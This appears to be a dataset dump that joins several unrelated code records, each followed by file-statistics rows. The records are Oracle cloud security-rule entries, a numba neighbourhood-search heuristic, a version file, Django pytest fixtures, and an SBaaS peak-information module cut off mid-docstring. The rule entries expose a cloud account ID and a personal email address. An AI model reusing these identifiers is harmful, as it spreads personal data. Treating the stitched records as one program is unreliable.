'/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_trusted_hosts_dblistener'],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/dblistener'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/sys_infra2wls_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/sys_infra2wls_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/sys_infra2otd_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/sys_infra2otd_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ahttps'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls2db_dbport',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls2db_dbport',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/dbport'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/dblistener'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2admin_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2admin_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ahttps'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True}]
| 112.619403 | 208 | 0.680439 | 9,555 | 90,546 | 6.332496 | 0.013919 | 0.138827 | 0.160312 | 0.192374 | 0.993885 | 0.99329 | 0.992133 | 0.992133 | 0.991654 | 0.988249 | 0 | 0.100454 | 0.158284 | 90,546 | 803 | 209 | 112.759651 | 0.693455 | 0.002507 | 0 | 0.59383 | 0 | 0.455013 | 0.744795 | 0.448887 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.001285 | 0 | 0.001285 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
a326fd21fb3a2be3b3d8282f251db2fe55afa637 | 4,339 | py | Python | kmmi/heuristics/neighborhood_search.py | Decitizen/kMMI | 921ef6e45fbec484251444886e246741d7f0120a | [
"MIT"
] | null | null | null | kmmi/heuristics/neighborhood_search.py | Decitizen/kMMI | 921ef6e45fbec484251444886e246741d7f0120a | [
"MIT"
] | null | null | null | kmmi/heuristics/neighborhood_search.py | Decitizen/kMMI | 921ef6e45fbec484251444886e246741d7f0120a | [
"MIT"
] | null | null | null | from time import process_time
from datetime import timedelta as td
import numpy as np
from numba import *
from kmmi.heuristics.initialize import *
from kmmi.heuristics.utils import __update_degree_vecs
@njit
def ls_one_n_beam(Uo, Uo_w, A, A_beam, alpha, beta, tol=0.0,
                  find_maxima=False, one_in_k=False, verbose=False):
    """Computes local search in the 1-neighborhood of the Ho set such that
    node is selected using beam criterion; the space of neighbors with heaviest
    links in the 1-neighborhood of the current H nodes is searched first. First
    improvement of the objective function is returned.

    Parameters
    ----------
    Uo : boolean membership mask over nodes; True marks members of the
        current solution set
    Uo_w : objective function value of the current solution
    A : adjacency (weight) matrix, indexed as A[i, j]
    A_beam : per-node array of candidate neighbor indices; -1 pads empty slots
    alpha, beta : per-node auxiliary vectors updated by __update_degree_vecs
        on a successful swap (presumably in/out degree sums — TODO confirm
        against kmmi.heuristics.utils)
    tol : unused in this function body (kept for interface compatibility)
    find_maxima : if True, scan all swaps and keep the best one instead of
        stopping at the first improvement
    one_in_k : if True, each candidate xj is compared against one randomly
        drawn current member instead of against every member
    verbose : if True, print progress to stdout

    Returns
    -------
    (U, U_w, alpha, beta) : updated membership mask, objective value and
    auxiliary vectors; the inputs are returned unchanged when no improving
    swap is found.
    """
    k = Uo.sum()            # number of nodes currently in the solution
    n = A_beam.shape[1]     # beam width (candidates stored per node)
    Up_w = Uo_w             # best objective value seen so far
    f_prime = 0.0           # best improvement delta seen so far
    xip = xjp = -1          # best (remove, add) pair; -1 == none found yet
    u_idxs = np.where(Uo)[0]
    if not one_in_k:
        # All current members are swap-out candidates; copy before the
        # optional shuffle so replacement order is independent of scan order.
        replace_ids = u_idxs.copy()
        if not find_maxima:
            # Randomize scan order for the first-improvement strategy.
            np.random.shuffle(u_idxs)
    L = 0                   # count of evaluated swaps (reporting only)
    stop = False
    for i in range(k):
        if stop: break
        v = u_idxs[i]
        for j in range(n):
            if stop: break
            xj = A_beam[v,j]
            # Candidate must be a real node (-1 pads the beam) and must not
            # already belong to the solution.
            if xj != -1 and not Uo[xj]:
                if one_in_k:
                    # Draw a single random member to compare against.
                    replace_ids = np.random.choice(u_idxs, 1)
                for xi in replace_ids:
                    L += 1
                    # Objective change for swapping xi out, xj in; the
                    # A[xi,xj] term presumably removes the xi-xj edge
                    # counted in alpha[xj] — TODO confirm.
                    delta_f = alpha[xj] - alpha[xi] - A[xi,xj]
                    if delta_f > f_prime:
                        Up_w = Uo_w + delta_f
                        f_prime = delta_f
                        xip = xi
                        xjp = xj
                        if verbose:
                            print(':: Improvement found: +', (delta_f))
                            print(':: Objective function value: ', Up_w,', iters: ', L)
                        if not find_maxima:
                            # First improvement accepted: abort the scan.
                            stop = True
                            break
    if Up_w == Uo_w:
        # No improving swap found; hand the inputs back unchanged.
        if verbose: print(':: No improvement found during local search.')
        return Uo, Uo_w, alpha, beta
    assert xip >= 0 and xjp >= 0
    # Commit the best swap and refresh the auxiliary degree vectors.
    alpha_p, beta_p = __update_degree_vecs(A, alpha, beta, xip, xjp)
    Up = Uo.copy()
    Up[xjp] = True
    Up[xip] = False
    return Up, Up_w, alpha_p, beta_p
@njit
def ls_one_n_beam_fs(Uo, Uo_fs, Uo_w, A, A_beam, alpha, beta, tol=0.0,
                  find_maxima=False, one_in_k=False, verbose=False):
    """Computes local search in the 1-neighborhood of the Ho set such that
    node is selected using beam criterion; the space of neighbors with heaviest
    links in the 1-neighborhood of the current H nodes is searched first. First
    improvement of the objective function is returned.

    Variant of ls_one_n_beam with an additional node set Uo_fs whose members
    contribute to the beam scan but are never swapped out themselves
    (presumably a "forced"/fixed selection — TODO confirm with callers).

    Parameters
    ----------
    Uo : boolean mask of swappable solution members
    Uo_fs : boolean mask of fixed solution members (their beams are scanned,
        but only Uo members appear in replace_ids)
    Uo_w : objective value of the current solution
    A, A_beam, alpha, beta, tol, find_maxima, one_in_k, verbose :
        see ls_one_n_beam; tol is unused here as well.

    Returns
    -------
    (U, U_w, alpha, beta) : updated swappable mask, objective value and
    auxiliary vectors; inputs returned unchanged when no improvement exists.
    """
    k1 = Uo.sum()           # number of swappable members
    k2 = Uo_fs.sum()        # number of fixed members
    n = A_beam.shape[1]     # beam width (candidates per node)
    # Keep track of best improvement
    Up_w = Uo_w
    f_prime = 0.0
    xip = xjp = -1          # best (remove, add) pair; -1 == none yet
    u_idxs = np.where(Uo)[0]
    u_idxs_fs = np.where(Uo_fs)[0]
    if not one_in_k:
        # Only swappable members are removal candidates; copy before shuffle.
        replace_ids = u_idxs.copy()
        if not find_maxima:
            np.random.shuffle(u_idxs)
    L = 0                   # evaluated swap count (reporting only)
    stop = False
    # Scan the beams of swappable members first, then of fixed members.
    for i in range(k1+k2):
        if stop: break
        v = u_idxs[i] if i < k1 else u_idxs_fs[i-k1]
        for j in range(n):
            if stop: break
            xj = A_beam[v,j]
            # Candidate must be a real node and outside both sets.
            if xj != -1 and not Uo[xj] and not Uo_fs[xj]:
                if one_in_k:
                    # Draw a single random swappable member to compare with.
                    replace_ids = np.random.choice(u_idxs, 1)
                for xi in replace_ids:
                    L += 1
                    # Objective change for swapping xi out, xj in; the
                    # A[xi,xj] term presumably corrects for the xi-xj
                    # edge — TODO confirm.
                    delta_f = alpha[xj] - alpha[xi] - A[xi,xj]
                    if delta_f > f_prime:
                        Up_w = Uo_w + delta_f
                        f_prime = delta_f
                        xip = xi
                        xjp = xj
                        if verbose:
                            print(':: Improvement found: +', (delta_f))
                            print(':: Objective function value: ', Up_w,', iters: ', L)
                        if not find_maxima:
                            # First improvement accepted: abort the scan.
                            stop = True
                            break
    if Up_w == Uo_w:
        # No improving swap found; hand the inputs back unchanged.
        if verbose: print(':: No improvement found during local search.')
        return Uo, Uo_w, alpha, beta
    assert xip >= 0 and xjp >= 0
    # Commit the best swap and refresh the auxiliary degree vectors.
    alpha_p, beta_p = __update_degree_vecs(A, alpha, beta, xip, xjp)
    Up = Uo.copy()
    Up[xjp] = True
    Up[xip] = False
return Up, Up_w, alpha_p, beta_p | 34.436508 | 87 | 0.5121 | 618 | 4,339 | 3.414239 | 0.184466 | 0.028436 | 0.017062 | 0.017062 | 0.872512 | 0.872512 | 0.84218 | 0.825118 | 0.825118 | 0.825118 | 0 | 0.014236 | 0.401014 | 4,339 | 126 | 88 | 34.436508 | 0.797614 | 0.133441 | 0 | 0.823529 | 0 | 0 | 0.056512 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 1 | 0.019608 | false | 0 | 0.058824 | 0 | 0.117647 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6e6100620cfaa90d3fa369e243ae848c5bd26be3 | 113 | py | Python | alphapose/version.py | SvipRepetitionCounting/AlphaPose | 0cc38e4c1d6f08ea9c34c720ae188506d3de6eb6 | [
"Apache-2.0"
] | 6,306 | 2018-02-04T11:14:11.000Z | 2022-03-31T13:36:53.000Z | alphapose/version.py | SvipRepetitionCounting/AlphaPose | 0cc38e4c1d6f08ea9c34c720ae188506d3de6eb6 | [
"Apache-2.0"
] | 982 | 2018-02-05T03:06:49.000Z | 2022-03-31T16:58:57.000Z | alphapose/version.py | SvipRepetitionCounting/AlphaPose | 0cc38e4c1d6f08ea9c34c720ae188506d3de6eb6 | [
"Apache-2.0"
] | 1,855 | 2018-02-04T11:27:12.000Z | 2022-03-31T17:25:53.000Z | # GENERATED VERSION FILE
# TIME: Tue Aug 18 16:28:27 2020
__version__ = '0.3.0+cbc364f'
short_version = '0.3.0'
| 18.833333 | 32 | 0.699115 | 21 | 113 | 3.52381 | 0.714286 | 0.216216 | 0.243243 | 0.27027 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.221053 | 0.159292 | 113 | 5 | 33 | 22.6 | 0.557895 | 0.469027 | 0 | 0 | 1 | 0 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
42c74d765b0525854badc5e05769457b1a3c3075 | 2,012 | py | Python | api/tests/unit/conftest.py | DiogenesPolanco/flagsmith | 55f80a17845c10acbfbc9e195c36801b322e18ac | [
"BSD-3-Clause"
] | 2 | 2021-07-20T17:03:38.000Z | 2021-07-20T17:06:25.000Z | api/tests/unit/conftest.py | DiogenesPolanco/flagsmith | 55f80a17845c10acbfbc9e195c36801b322e18ac | [
"BSD-3-Clause"
] | 7 | 2021-10-01T01:17:49.000Z | 2021-10-12T15:44:48.000Z | api/tests/unit/conftest.py | DiogenesPolanco/flagsmith | 55f80a17845c10acbfbc9e195c36801b322e18ac | [
"BSD-3-Clause"
] | 2 | 2021-11-16T12:27:37.000Z | 2021-12-22T06:55:39.000Z | import pytest
from projects.models import Project
from organisations.models import Organisation
from environments.models import Environment
from users.models import FFAdminUser
@pytest.fixture()
def organisation_one(db):
    """First test organisation, persisted to the test database."""
    org = Organisation.objects.create(name="Test organisation 1")
    return org
@pytest.fixture()
def organisation_two(db):
    """Second test organisation, persisted to the test database."""
    org = Organisation.objects.create(name="Test organisation 2")
    return org
@pytest.fixture()
def organisation_one_project_one(organisation_one):
    """First project belonging to organisation one."""
    project = Project.objects.create(
        name="Test Project 1", organisation=organisation_one
    )
    return project
@pytest.fixture()
def organisation_one_project_two(organisation_one):
    """Second project belonging to organisation one."""
    project = Project.objects.create(
        name="Test Project 2", organisation=organisation_one
    )
    return project
@pytest.fixture()
def organisation_two_project_one(organisation_two):
    """First project belonging to organisation two."""
    project = Project.objects.create(
        name="Test Project 1", organisation=organisation_two
    )
    return project
@pytest.fixture()
def organisation_two_project_two(organisation_two):
    """Second project belonging to organisation two."""
    project = Project.objects.create(
        name="Test Project 2", organisation=organisation_two
    )
    return project
@pytest.fixture()
def organisation_one_project_one_environment_one(organisation_one_project_one):
    """First environment under organisation one's first project."""
    env = Environment.objects.create(
        name="Test Environment 1",
        project=organisation_one_project_one,
    )
    return env
@pytest.fixture()
def organisation_one_project_one_environment_two(organisation_one_project_one):
    """Second environment under organisation one's first project."""
    env = Environment.objects.create(
        name="Test Environment 2",
        project=organisation_one_project_one,
    )
    return env
@pytest.fixture()
def organisation_two_project_one_environment_one(organisation_two_project_one):
    """First environment under organisation two's first project."""
    env = Environment.objects.create(
        name="Test Environment 1",
        project=organisation_two_project_one,
    )
    return env
@pytest.fixture()
def organisation_two_project_one_environment_two(organisation_two_project_one):
    """Second environment under organisation two's first project."""
    env = Environment.objects.create(
        name="Test Environment 2",
        project=organisation_two_project_one,
    )
    return env
@pytest.fixture()
def user_one():
    """A plain admin user for tests."""
    user = FFAdminUser.objects.create(email="test@example.com")
    return user
| 28.742857 | 87 | 0.801193 | 247 | 2,012 | 6.255061 | 0.11336 | 0.090615 | 0.113916 | 0.18123 | 0.858252 | 0.810356 | 0.803884 | 0.728803 | 0.561812 | 0.494498 | 0 | 0.005593 | 0.111332 | 2,012 | 69 | 88 | 29.15942 | 0.858501 | 0 | 0 | 0.326087 | 0 | 0 | 0.090457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.23913 | false | 0 | 0.108696 | 0.23913 | 0.586957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
6e4a27ad0c729c08d3a53b69c7c8abdaa40481b6 | 36,427 | py | Python | SBaaS_quantification/stage01_quantification_peakInformation_io.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | SBaaS_quantification/stage01_quantification_peakInformation_io.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | SBaaS_quantification/stage01_quantification_peakInformation_io.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | # System
import json,re
# SBaaS
from .stage01_quantification_peakInformation_query import stage01_quantification_peakInformation_query
from .stage01_quantification_MQResultsTable_query import stage01_quantification_MQResultsTable_query
# Resources
from io_utilities.base_importData import base_importData
from io_utilities.base_exportData import base_exportData
from matplotlib_utilities.matplot import matplot
from SBaaS_base.sbaas_template_io import sbaas_template_io
from ddt_python.ddt_container import ddt_container
class stage01_quantification_peakInformation_io(stage01_quantification_peakInformation_query,
stage01_quantification_MQResultsTable_query,
sbaas_template_io):
    def export_scatterLinePlot_peakInformation_matplot(self,experiment_id_I,sample_names_I=[],
                        sample_types_I=['Standard'],
                        component_names_I=[],
                        peakInfo_I = ['retention_time'],
                        acquisition_date_and_time_I=[None,None],
                        x_title_I='Time [hrs]',y_title_I='Retention Time [min]',y_data_type_I='acquisition_date_and_time',
                        plot_type_I='single',
                        filename_O = 'tmp',
                        figure_format_O = 'png'):
        '''Plot peak information (retention-time, height, s/n, asymmetry, ...)
        per component over acquisition time using matplotlib.
        INPUT:
        experiment_id_I = experiment to analyze
        sample_names_I = explicit sample names (used only together with a single sample type)
        sample_types_I = sample types to query when explicit names are not usable
        component_names_I = explicit component names (also fixes plotting order)
        peakInfo_I = peak parameters to plot (e.g. 'retention_time')
